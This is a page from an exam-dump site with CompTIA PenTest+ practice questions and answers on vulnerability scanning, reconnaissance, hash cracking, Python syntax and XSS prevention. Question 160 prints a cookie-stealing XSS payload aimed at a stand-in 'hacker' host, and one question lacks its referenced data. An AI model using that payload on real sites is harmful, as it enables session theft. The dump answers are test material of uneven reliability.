Free Access to CompTIA.PT0-002.v2025-09-27.q272 with Valid Practice Test (Page 33)

Request Exam Contact

Home
View All Exams
New QA's
Upload

PRACTICE EXAMS:

Oracle
Fortinet
Juniper
Microsoft
Cisco
Citrix
CompTIA
VMware
ISC
SAP
EMC
PMI
HP
Salesforce
Other

Oracle
Fortinet
Juniper
Microsoft
Cisco
Citrix
CompTIA
VMware
ISC
SAP
EMC
PMI
HP
Salesforce

Home
CompTIA Certification
PT0-002 Exam
CompTIA.PT0-002.v2025-09-27.q272 Dumps

««
«
…
28
29
30
31
32
33
34
35
36
37
…
»
»»

Question 156

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

A.OpenVAS
B.Drozer
C.Burp Suite
D.OWASP ZAP

Correct Answer: A

Explanation
OpenVAS is a full-featured vulnerability scanner.
OWASP ZAP = Burp Suite
Drozer (Android) = drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

Comment: *

Name: *

Email: *

Verification: *

insert code

Question 157

A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

A.IP addresses and subdomains
B.Zone transfers
C.DNS forward and reverse lookups
D.Internet search engines
E.Externally facing open ports
F.Shodan results

Correct Answer: A,D

A: IP addresses and subdomains. This is correct. IP addresses and subdomains are useful information for a penetration tester to identify the scope and range of the company's web presence. IP addresses can reveal the location, network, and service provider of the company's web servers, while subdomains can indicate the different functions and features of the company's website. A penetration tester can use tools like whois, Netcraft, or DNS lookups to find IP addresses and subdomains associated with the company's domain name.
D: Internet search engines. This is correct. Internet search engines are powerful tools for a penetration tester to perform passive information gathering around the company's web presence. Search engines can provide a wealth of information, such as the company's profile, history, news, social media accounts, reviews, products, services, customers, partners, competitors, and more. A penetration tester can use advanced search operators and keywords to narrow down the results and find relevant information. For example, using the site: operator can limit the results to a specific domain or subdomain, while using the intitle: operator can filter the results by the title of the web pages.

Comment: *

Name: *

Email: *

Verification: *

insert code

Question 158

During an engagement, a penetration tester found the following list of strings inside a file:

Which of the following is the BEST technique to determine the known plaintext of the strings?

A.Credential-stuffing attack
B.Brute-force attack
C.Rainbow table attack
D.Dictionary attack

Correct Answer: C

Comment: *

Name: *

Email: *

Verification: *

insert code

Question 159

Which of the following expressions in Python increase a variable val by one (Choose two.)

A.val++
B.+val
C.val=(val+1)
D.++val
E.val=val++
F.val+=1

Correct Answer: C,F

In Python, there are two ways to increase a variable by one: using the assignment operator (=) with an arithmetic expression, or using the augmented assignment operator (+=). The expressions val=(val+1) and val+=1 both achieve this goal. The expressions val++ and ++val are not valid in Python, as there is no increment operator. The expressions +val and val=val++ do not change the value of val2.
https://pythonguides.com/increment-and-decrement-operators-in-python/

Comment: *

Name: *

Email: *

Verification: *

insert code

Question 160

Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

A.Web-application firewall
B.Parameterized queries
C.Output encoding
D.Session tokens
E.Input validation
F.Base64 encoding

Correct Answer: C,E

Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the < string when writing to an HTML page.
Output encoding and input validation are two of the best methods to prevent against this type of attack, which is known as cross-site scripting (XSS).
Output encoding is a technique that converts user-supplied input into a safe format that prevents malicious scripts from being executed by browsers or applications.
Input validation is a technique that checks user-supplied input against a set of rules or filters that reject any invalid or malicious data.
Web-application firewall is a device or software that monitors and blocks web traffic based on predefined rules or signatures, but it may not catch all XSS attacks.
Parameterized queries are a technique that separates user input from SQL statements to prevent SQL injection attacks, but they do not prevent XSS attacks.
Session tokens are values that are used to maintain state and identify users across web requests, but they do not prevent XSS attacks.
Base64 encoding is a technique that converts binary data into ASCII characters for transmission or storage purposes, but it does not prevent XSS attacks.

Comment: *

Name: *

Email: *

Verification: *

insert code

««
«
…
28
29
30
31
32
33
34
35
36
37
…
»
»»

[×]

Download PDF File

Enter your email address to download CompTIA.PT0-002.v2025-09-27.q272 Dumps

Email:

Our website provides the Largest and the most Latest vendors Certification Exam materials around the world.

Using dumps we provide to Pass the Exam, we has the Valid Dumps with passing guranteed just which you need.

DMCA
About
Contact Us
Privacy Policy
Terms & Conditions

©2026 FreeQAs

www.freeqas.com materials do not contain actual questions and answers from Cisco's certification exams.

Web Analytics Made Easy - Statcounter